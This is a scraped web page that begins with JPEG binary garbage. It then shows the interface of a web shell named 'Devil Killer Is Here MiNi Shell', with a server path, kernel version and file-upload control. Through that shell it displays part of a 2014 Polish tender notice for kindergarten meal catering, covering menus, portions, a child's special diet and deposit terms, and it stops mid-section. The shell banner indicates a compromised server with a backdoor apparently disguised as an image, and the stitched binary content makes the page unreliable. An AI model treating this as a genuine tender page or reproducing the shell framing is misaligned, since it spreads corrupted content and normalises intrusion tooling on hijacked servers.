JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/44654-N-2014.html

<p class="kh_header"><b>Piechowice: Przygotowanie i dostawa trzech posiłków dziennie do Przedszkola Samorządowego Nr 1 w Piechowicach. Znak sprawy: PS1/0700/624/14.</b><br>
<b>Numer ogłoszenia: 44654 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Samorządowe Nr 1 w Piechowicach , Ul. Żymierskiego 77, 58-573 Piechowice, woj. dolnośląskie, tel. 75 761 22 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://piechowice.bip.pbox.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostawa trzech posiłków dziennie do Przedszkola Samorządowego Nr 1 w Piechowicach. Znak sprawy: PS1/0700/624/14..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usług dla zamówienia pn.: Przygotowanie i dostawa trzech posiłków dziennie do Przedszkola Samorządowego Nr 1 w Piechowicach. Zamówienie to opisane jest następującymi kodami wg. Wspólnego Słownika Zamówień CPV: CPV 55 52 31 00 - 3 Usługi w zakresie posiłków szkolnych CPV 55 32 10 00 - 6 Usługi przygotowywania posiłków CPV 55 52 40 00 - 9 Usługi dostarczania posiłków do szkół 2. Zamówienie obejmuje przygotowanie i dostawę trzech posiłków dziennie: śniadań, obiadów dwudaniowych, podwieczorków do: Przedszkola Samorządowego nr 1 w Piechowicach ul. Żymierskiego 77. Średnio dziennie przewiduje się dostawę około 60 śniadań, 75 obiadów i 75 podwieczorków. Przewiduje się, że w okresie realizacji umowy zostanie zakupionych około 11280 sztuk śniadań, 14100 obiadów i podwieczorków. Zamawiający zastrzega możliwość zmniejszenia lub zwiększenia ilości dostarczanych posiłków , jednak nie więcej niż o 30% w skali całego okresu realizacji umowy. 3. Wymagania dotyczące posiłków. a) śniadania ; mleko z mieszanką płatków zbożowych lub płatkami zbożowymi czekoladowymi , ryżowymi wzbogaconymi witaminami, napój mleczny + bułka z miodem lub kremem czekoladowo -orzechowym, kanapki z wędliną z dodatkiem warzyw + herbata, kiełbasa na gorąco z chlebem + herbata, b) obiady dwudaniowe : zupa i drugie danie: 2 posiłki mięsne ( udko , schab, pierś z kurczaka, kotlet mielony + ziemniaki do każdego mięsa) lub jeden posiłek półmięsny np. gołąbki z ryżem i mięsem itp., jeden posiłek bezmięsny mączny ( naleśniki, pierogi, makaron , ryż + sos), jeden posiłek : ryba + do każdego posiłku surówka i kompot lub sok, c) podwieczorki jogurt, kisiel, owoc typu jabłko lub banan, ciasteczka lub ciasta własnego wypieku, ciasta drożdżowe, placek z jabłkami lub innymi owocami, koktajl owocowy, do bezowocowego podwieczorku napój . 4. Przykładowy jadłospis dołączono do SIWZ jako załącznik nr 8. Jest to jadłospis podstawowy. Wszystkie odstępstwa od tego jadłospisu (związane w szczególności z sezonową dostępnością niektórych warzyw i owoców) muszą być zaakceptowane przez Zamawiającego. 5. Ustala się gramaturę posiłków dla dzieci: Jadłospis winien zawierać: a) śniadanie: mleko z mieszanką płatków zbożowych lub płatkami zbożowymi czekoladowym wzbogaconymi witaminami, oraz płatkami ryżowymi , kasza manna na mleku, kluski lane na mleku , napój mleczny+ bułka z miodem lub kremem czekoladowo-orzechowym, kanapki z wędliną z dodatkiem warzyw+ herbata, kiełbasa na gorąco z chlebem +herbata, - pojemność - 150 ml zupy lub mlecznego napoju - gramatura 60 g kanapka lub bułka z dodatkami - kaloryczność 400 kcal b) obiad: b1) porcja zupy spełniająca następujące warunki: - pojemność - 200 ml, - kaloryczność 150 kcal, - temperatura w granicach 65 stopni Celsjusza b2) drugie danie spełniające następujące warunki: tygodniowo: 2 posiłki mięsne ( np. udko, schab, pierś z kurczaka, kotlet mielony + ziemniaki do każdego mięsa lub ryż, kasza, makaron) 1 posiłek pół mięsny np. gołąbki z mięsem i ryżem itp. 1 posiłek bezmięsny-mączny( naleśniki, pierogi, makaron, ryż + sos) 1 posiłek - ryba +do każdego posiłku surówka i kompot lub sok Co najmniej 540 g, w tym : 100 g ziemniaki ( kasza, ryż, makaron zamiennie) 50 g mięso lub ryba, 40 g su-rówka lub jarzyny gotowane, 150 g naleśniki lub pierogi, kompot 150 ml - kaloryczność - 495 kcal Temperatura w granicach 65 stopni Celsjusza, c) podwieczorek : np. jogurt, kisiel , owoc typu jabłko lub banan, ciasteczka lub ciasta własnego wypieku, ciasta drożdżowe, placek z jabłkami lub innymi owocami, koktajl owocowy , do bezowocowego podwieczorku napój. - napój - 150 ml - dodatki: ciastko i owoce - 60 g - kaloryczność 180 kcal. 6. Wymagania pozostałe: a) Posiłki muszą być przygotowane zgodnie z zasadami racjonalnego żywienia, urozmaicone, o wysokiej wartości odżywczej oraz w ciągu jednej dekady nie powinny się powtarzać. Posiłki winny być przygotowane zgodnie z normami żywieniowymi dla dzieci w wieku przedszkolnym na podstawie jadłospisu przygotowanego przez osobę po stronie Wykonawcy spełniającą warunki udziału w postępowaniu zawarte w rozdziale IV pkt 1 ppkt 3 SIWZ. b) Skład poszczególnych posiłków winien zapewniać zbilansowanie poszczególnych składników odżywczych w ciągu jednego dnia. c) liczba posiłków dziennie może ulec zmianie, gdyż ich ilość jest uzależniona od frekwencji dzieci w Przedszkolu. O zmianach ilości zamawianych na dany dzień posiłków Zamawiający poinformuje Wykonawcę najpóźniej w dniu poprzednim do godziny 14:00 (telefonicznie lub e-mailem wg. wyboru Zamawiającego). Przy czym Zamawiający zastrzega sobie możliwość telefonicznej zmiany ilości zamówionych wcześniej, na dany dzień obiadów i podwieczorków od godziny 09:00 w dniu ich dostarczenia, o ile Wykonawca wyrazi zgodę na taką zmianę. c) śniadania dowożone będą gorące pomiędzy godz. 08:00 a 08:15 w dniu wydania, w opakowaniach zbiorczych (termosach), obiady dowożone będą gorące pomiędzy godz. 11:00 a 11:15 w dniu wydania w opakowaniach zbiorczych (termosach) spełniających wymagania sanitarno - higieniczne, podwieczorki dowożone będą pomiędzy godz. 13:15 a 13:30 w dniu wydania w opakowaniach zbiorczych (termosach) spełniających wymagania sanitarno - epidemiologiczne. d) w ramach wykonywanej usługi Wykonawca zobowiązany jest zapewnić naczynia do wydawania posiłków, sprzęt do mycia brudnych naczyń oraz sprzęt do ewentualnego podgrzania posiłków. Wykonawca zobowiązany jest do posiadania pojemników na czyste i zużyte naczynia oraz naczynia wielokrotnego użycia. Istnieje możliwość skorzystania z naczyń, sztućców znajdujących się w Przedszkolu. Zasady korzystania z wyposażenia placówki należy bezpośrednio uzgadniać z Dyrektorem Przedszkola. Zasady te dotyczą odpłatności: za korzystanie z na-czyń i sztućców. e) Wykonawca będzie dostarczał posiłki do siedziby Zamawiającego tj. do Przedszkola do pomieszczenia Jadalni pok. nr 3 (na parterze) pojazdem przystosowanym do przewozu posiłków dopuszczonym przez właściwego Państwowego Inspektora Sanitarnego, f) Wykonawca zobowiązany jest do: - odbioru termosów i pozostałości po posiłkach, - zapewnienia pojemnika/pojemników na pozostałości po posiłkach i opróżniania tego pojemnika/pojemników, w tym samym dniu w którym dostarczono posiłki najpóźniej do godziny 14:30. 7. Samochód do przewozu posiłków w ramach niniejszego zamówienia musi być przystosowany do przewozu żywności oraz spełniać podstawowe wymagania sanitarno - higieniczne potwierdzone stosownym zaświadczeniem właściwego miejscowo organu inspekcji sanitarnej. 8. Zakład, w którym będą przygotowywane posiłki objęte zamówieniem musi spełniać wymagania sanitarno-higieniczne potwierdzone stosowną decyzją właściwego miejscowo organu inspekcji sanitarnej o zatwierdzeniu zakładu do prowadzenia działalności w zakresie przygotowywania i dowożenia posiłków w formie cateringu. 9. Zamawiający wymaga, aby Wykonawca przedstawił dekadowy jadłospis do akceptacji . Jadłospis by mógł być stosowany wymaga akceptacji Dyrektora Przedszkola lub osoby upoważnionej. Dekadowy jadłospis Wykonawca przedkłada (pisemnie lub e-mailem) Zamawiającemu na trzy dni przed dekadą do wcześniejszego zatwierdzenia. Zamawiający ma prawo wnieść (pisemnie lub e-mailem) uwagi w ciągu jednego dnia od daty otrzymania jadłospisu. Zatwierdzenie jadłospisu przez Zamawiającego odbywać się będzie pisemnie lub e-mailem. Jadłospis musi uwzględniać potrzeby dzieci będących na dietach specjalnych, w szczególności, obecnie do Przedszkola uczęszcza jedno dziecko chore na nerczycę dla którego musi być zastosowana dieta wg. niżej podanych zaleceń oraz jedno dziecko uczulone na cytrusy oraz jedno dziecko uczulone na ryby. Jadłospis sporządzany przez Wykonawcę musi uwzględniać wymagania ww. diet specjalnych. Zamawiający zastrzega sobie prawo zgłaszania (pisemnie lub e-mailem) do jadłospisu innych diet specjalnych o ile wystąpi taka potrzeba. Dieta w nerczycy. Zalecane produkty: - pieczywo - wszystkie gatunki bez dodatku soli kuchennej, - mąka - wszystkie gatunki, - kasze - wszystkie gatunki, - mleko - we wszystkich postaciach, - ser - biały, twarogowy ( bez soli) - jaja - jaja całe, żółtka, białka, - mięso - chude gatunki mięsa: cielęcina, wołowina, konina, drób, kura, kurczaki, - ryby - chude gatunki ryb: szczupak, pstrąg, lin, leszcz, sandacz, dorsz, - masło - masło świeże nie solone, - śmietana - śmietana, śmietanka, - warzywa i owoce- wszystkie gatunki świeże, wliczając je w dozwolona ilość płynów, - ziemniaki - gotowane, pieczone, - groch, fasola - nie podaje się żadnych - cukier, słodycze - cukier, miód, przetwory owocowe na cukrze, - przyprawy - łagodne: pietruszka, seler, majeranek, cebula, szczypiorek, koperek, cynamon, wanilia, kwasek cytrynowy, skórka od cytryny i pomarańczowa, kminek i chrzan, - używki - słaba herbata, słabe kakao. Przeciwskazania: - solone ciastka, - sery żółte, topione, solone, podpuszczkowe, pikantne, - tłuste gatunki, podroby, wędliny, konserwy, - kiszonki, warzywa solone, - smażone, odsmażane, - nie podaje się żadnych roślin strączkowych, - czekolada, tłuste wyroby cukiernicze z kremem i ciasta spulchniane proszkiem, - pieprz, ocet, musztarda, sól, ziele angielskie, liść laurowy, gałka muszkatołowa, - kawa naturalna, alkohol. 10. Wykonawca jest zobowiązany przed podpisaniem umowy dostarczyć Zamawiającemu: a) jadłospis na pierwszą dekadę świadczenia usług, b) stosowną decyzję właściwego miejscowo organu inspekcji sanitarnej o zatwierdzeniu zakładu (w którym będą przygotowywane posiłki w ramach niniejszego zamówienia) do prowadzenia działalności w zakresie przygotowywania i dowożenia posiłków w formie cateringu, c) stosowne zaświadczenie właściwego miejscowo organu inspekcji sanitarnej, że samochód do przewozu posiłków w ramach niniejszego zamówienia jest przystosowany do przewozu żywności. 11. Termin wykonania zamówienia. - termin rozpoczęcia: od dnia 03 marca 2014 r. - (jest to termin przewidywany, rozpoczęcie świadczenia usług jest uzależnione od rozstrzygnięcia procedury przedmiotowej przetargowej) - termin zakończenia: - 31 grudnia 2014 r. z wyłączeniem miesiąca lipca 2014 r. 12. Integralną częścią opisu przedmiotu zamówienia są obowiązki Wykonawcy wynikające z postanowień wzoru umowy, stanowiącego Załącznik nr 7 do SIWZ. UWAGA: ilekroć w niniejszym ogłoszeniu użyto skrótu: a) SIWZ należy przez to rozumieć Specyfikację Istotnych Warunków Zamówienia na zadanie pn.: Przygotowanie i dostawa trzech posiłków dziennie do Przedszkola Samorządowego Nr 1 w Piechowicach. Znak sprawy: PS1/0700/624/14, b) ustawa, PZP, ustawa PZP - należy przez to rozumieć obowiązującą ustawę z dnia 29 stycznia 2009 r. Prawo zamówień publicznych (tekst jednolity z 2013 r. Dz.U. poz. 907 wraz z późniejszymi zmianami)...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.32.10.00-6, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 500,00 zł (słownie: pięćset złotych). 2.Forma wadium. 1)Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.: a)pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c)gwarancjach bankowych, d)gwarancjach ubezpieczeniowych, e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 li-listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz.U. Nr z 2007 Nr 42, poz. 275 z późn. zm.). 2)W przypadku złożenia przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzoną zgodnie z obowiązującym prawem. Winna zawierać następujące elementy: a)nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib, b)określenie wierzytelności, która ma być zabezpieczona gwarancją, c)kwotę gwarancji, d)termin ważności gwarancji, e)zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające następujące lub analogicznie brzmiące oświadczenia: Zobowiązujemy się nieodwołalnie i bezwarunkowo wypłacić Państwu-Beneficjentowi całą kwotę zobowiązania na pierwsze pisemne żądanie wraz z oświadczeniem, że: ................ (nazwa Wykonawcy) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz.U. z 2013 r. poz. 907 z późn. zm.), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ww. ustawy, lub pełnomocnictw, a nie udowodnił, że wynikało to z przyczyn nieleżących po jego stronie, lub w przypadku kiedy nie wywiązał się ze zobowiązań wynikających z poniższych warunków wynikających z art. 46 ust. 5 ww. ustawy: odmówił podpisania umowy na warunkach określonych w ofercie, zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 3)Postanowienia podpunktu 2) stosuje się odpowiednio do poręczeń, określonych powyżej w podpunktach: 1) b) oraz 1) e). 3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4.Wadium w pieniądzu należy wnieść wyłącznie przelewem na rachunek bankowy Zamawiającego: prowadzony przez bank PKO PB S.A.: Nr 46 1020 2124 0000 8902 0152 8850 z adnotacją na tytule wpłaty: wadium - PS1-0700-624-14 - Przetarg: Posiłki dla Przedszkola Nr 1 w Piechowicach. 5.W przypadku wadium wnoszonego w pieniądzu, za skuteczne wniesienie Zamawiający uzna wadium, które w oznaczonym terminie w dniu otwarcia ofert znajduje się na rachunku Zamawiającego. 6.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał takiego dokumentu należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w pok. 7 -Księgowość - I piętro. Jeżeli Wykonawca prześle ofertę pocztą-przekaże za pośrednictwem kuriera lub innej osoby, winien kopię dowodu wniesienia wadium załączyć do oferty, natomiast oryginał dokumentu wadialnego umieścić np. w odrębnej kopercie oznaczonej -oryginał dowodu wniesienia wadium, przy czym oryginału dokumentu wadialnego nie należy trwale spinać z ofertą. 7.Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości. 8.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniej-sza, z zastrzeżeniem pkt 11. 9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wy-konania umowy. 10.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, iż wynikało to z przyczyn nieleżących po jego stronie. UWAGA: W przypadku wadium w formie gwarancji lub poręczenia, dokument ten winien zawierać klauzulę gwarancji zapłaty wymaganej kwoty wadium po zaistnieniu ww. okoliczności - patrz punkt 2 ppkt 2) lit. e. 12.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z punktem 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 13.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy. 14.Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy: a)odmówił podpisania umowy na warunkach określonych w ofercie, b)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 16.UWAGA: Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego, określonych ustawą PZP - Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie z treścią załącznika nr 2 do SIWZ. Oświadczenie to przywołane jest w niniejszym ogłoszeniu w punkcie III.6) pkt1).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna, gdy Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych w okresie ostatnich 3 (trzech) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przed upływem terminu składania ofert: jednej lub kilku usług polegających na przygotowaniu i sukcesywnym dostarczaniu posiłków, przez okres co najmniej 4 miesięcy, o wartości łącznie co najmniej 20.000,00 zł brutto. Pod pojęciem posiłku należy rozumieć: odpowiednio śniadanie; obiad; podwieczorek; kolacja, dru-gie śniadanie. z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane oraz udokumentowaniem, że wykazane usługi zostały lub są wykonywane należycie. UWAGA: Wykonawca może wykazać się umowami wieloletnimi (np. będącymi w trakcie realizacji), w ramach których, do upływu składania ofert, wykonane zostały usługi spełniające ww. wymagania. Ocena spełnienia tego warunku udziału w postępowaniu dokonana zostanie w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu  określonych w art. 22 ust. 1 PZP (Załącznik nr 2 do SIWZ i przywołanego w punkcie III.6) pkt 1) nieniejszego ogłoszenia) i informacje zawarte w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług. pn. Doświadczenie zawodowe - Załącznik nr 5 do SIWZ (Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych głównych usług przywołany jest również w punkcie III.4.1) tiret pierwsze niniejszego ogłoszenia) oraz załączonych przez Wykonawcę właściwych dowodów (o których mowa w Rozdziale V SIWZ oraz przywołanych w punkcie III.6 ppkt 4) niniejszego ogłoszenia), potwierdzających, że wykazane usługi zostały lub są wykonywane należycie. Decyzja, które usługi wykazane w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług. pn. Doświadczenie zawodowe - Załącznik nr 5 do SIWZ (Wykaz ten przywołany jest również w punkcie III.4.1) tiret pierwsze niniejszego ogłoszenia), są główne, pozostawiona jest Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie z treścią załącznika nr 2 do SIWZ. Oświadczenie to przywołane jest w punkcie III.6) pkt 1) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca: a)wykaże dysponowanie co najmniej jedną osobą która będzie sporządzała jadłospisy w ramach niniejszego zamówienia. Wskazana osoba-y musi posiadać co najmniej: średnie wykształcenie o kierunku dietetyka, i-lub żywienie człowieka, i-lub technologia żywności, i-lub równoważne wykształcenie np. studium policealne, i-lub podyplomowe na wcześniej wymienionych kierunkach, doświadczenie zawodowe przy sporządzaniu jadłospisów w żywieniu zbiorowym. b)Wskaże podstawę do dysponowania wykazaną-mi osobą-ami. Ocena spełnienia tego warunku udziału w postępowaniu dokonana zostanie w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP (Załącznik nr 2 do SIWZ i przywołanego w punkcie III.6) pkt 1) niniejszego ogłoszenia) i informacje zawarte w Wykazie osób - Załącznik nr 6 do SIWZ (Wykaz osób jest przywołany również w niniejszym ogłoszeniu w punkcie III.4.1) tiret drugie)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
